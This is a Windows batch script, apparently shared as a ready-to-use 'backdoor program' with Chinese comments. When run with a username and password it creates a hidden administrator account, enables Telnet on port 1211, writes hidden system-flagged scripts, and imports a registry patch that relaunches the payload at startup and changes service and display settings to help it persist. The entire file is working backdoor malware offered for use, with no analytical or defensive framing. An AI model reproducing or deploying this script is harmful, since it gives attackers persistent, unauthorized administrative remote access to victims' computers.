开后门程序.txt

很典型的开后门程序

@echo off
@if "%1" =="" goto user
@IF NOT EXIST %systemroot%\winhm.bat goto nobat
@attrib -h -S -r %systemroot%\winhm.bat
:nobat
@cd %systemroot%\system32\
@echo @echo off >%systemroot%\winhm.bat
@echo @echo 5 ^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 3 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 7 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo y ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 0 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo y ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 8 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo y ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 1211 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo y ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 0 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 4 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @echo 0 ^>^>%systemroot%\system32\gnm.txt >>winhm.bat
@echo @cd %systemroot%\system32\ >>winhm.bat
@echo @tlntadmn^<gnm.txt ^>nul >>winhm.bat
@echo @del gnm.txt >>winhm.bat
@echo exit >>winhm.bat
@attrib +h +r +S %systemroot%\winhm.bat
@IF NOT EXIST %systemroot%\system32\gnm.vbs goto novbs
@attrib -h -S -r %systemroot%\system32\gnm.vbs
:novbs
@echo set wshshell=createobject ("wscript.shell") >%systemroot%\system32\gnm.vbs
@echo a=wshshell.run ("cmd.exe /c net user %1 %2 /add",0) >>%systemroot%\system32\gnm.vbs
@echo b=wshshell.run ("cmd.exe /c net user %1 /active:y",0) >>%systemroot%\system32\gnm.vbs
@echo c=wshshell.run ("cmd.exe /c net localgroup administrators %1 /add",0) >>%systemroot%\system32\gnm.vbs
@echo c=wshshell.run ("cmd.exe /c start %systemroot%\winhm.bat",0) >>%systemroot%\system32\gnm.vbs
@attrib +h +r +S %systemroot%\system32\gnm.vbs
@start %systemroot%\system32\gnm.vbs


@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [hkey_local_machine\system\currentcontrolset\services\lanman
server\parameters] >>patch.dll 
@echo "autoshareserver"=dword:00000000 >>patch.dll
@echo "autosharewks"=dword:00000000 >>patch.dll

@echo [hkey_local_machine\system\currentcontrolset\control\lsa] >>patch.dll 
@echo "restrictanonymous"=dword:00000001 >>patch.dll

@echo [hkey_local_machine\system\currentcontrolset\services\netbt\
parameters] >>patch.dll 
@echo "smbdeviceenabled"=dword:00000000 >>patch.dll

@echo [hkey_local_machine\system\currentcontrolset\services\@remot
eregistry] >>patch.dll 
@echo "start"=dword:00000004 >>patch.dll
@echo [hkey_local_machine\system\currentcontrolset\services\schedu
le] >>patch.dll 
@echo "start"=dword:00000004 >>patch.dll
@echo [hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon] >>patch.dll 
@echo "shutdownwithoutlogon"="0" >>patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSv
r] >>patch.dll
@echo "DependOnService" =hex(7):52,00,70,00,63,00,53,00,73,00,00,00,54,00,63,00,70,0
0,\ >>patch.dll
@echo 49,00,70,00,00,00,00,00 >>patch.dll
@echo "Description"="允许远程用户登录到系统并且使用命令行运行控制台程序。" >>patch.dll
@echo "DisplayName"="Telnet" >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath" =hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,0
0,6f,00,\ >>patch.dll
@echo 74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,
32,00,5c,00,74,\ >>patch.dll
@echo 00,6c,00,6e,00,74,00,73,00,76,00,72,00,2e,00,65,00,78,00,65,
00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSv
r\Enum] >>patch.dll
@echo "0"="Root\\LEGACY_TLNTSVR\\0000" >>patch.dll
@echo "Count"=dword:00000001 >>patch.dll
@echo "NextInstance"=dword:00000001 >>patch.dll
@echo "dontdisplaylastusername"="1" >>patch.dll 
@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer] >>patch.dll
@echo "NoDriveTypeAutoRun"=dword:00000091 >>patch.dll
@echo "run"="gnm.vbs" >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Explorer\Advanced\Folder\Hidden\SHOWALL] >>patch.dll
@echo "RegPath"=" Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Adva
nced" >>patch.dll
@echo "Text"="@shell32.dll,-30500" >>patch.dll
@echo "Type"="radio" >>patch.dll
@echo "Checkedvalue"=dword:00000000 >>patch.dll
@echo "valueName"="Hidden" >>patch.dll
@echo "Defaultvalue"=dword:00000002 >>patch.dll
@echo "HKeyRoot"=dword:80000001 >>patch.dll
@echo "HelpID"="shell.hlp#51105" >>patch.dll

@regedit /s patch.dll
@del patch.dll

@echo 5 >%systemroot%\system32\gnm.txt
@echo 3 >>%systemroot%\system32\gnm.txt
@echo 7 >>%systemroot%\system32\gnm.txt
@echo y >>%systemroot%\system32\gnm.txt
@echo 0 >>%systemroot%\system32\gnm.txt
@echo y >>%systemroot%\system32\gnm.txt
@echo 8 >>%systemroot%\system32\gnm.txt
@echo y >>%systemroot%\system32\gnm.txt
@echo 1211 >>%systemroot%\system32\gnm.txt
@echo y >>%systemroot%\system32\gnm.txt
@echo 0 >>%systemroot%\system32\gnm.txt
@echo 4 >>%systemroot%\system32\gnm.txt
@echo 0 >>%systemroot%\system32\gnm.txt
@cd %systemroot%\system32\
@tlntadmn<gnm.txt >nul
@del gnm.txt

@goto end

:user
@echo Example: "Name Password" 

PAUSE >NUL
rem 命令行下运行 a.bat username password
rem 可每次在启动时自动建立你设置的帐号，开1211的TELNET端口，此外
rem 是一些注册表补丁~

:end
@exit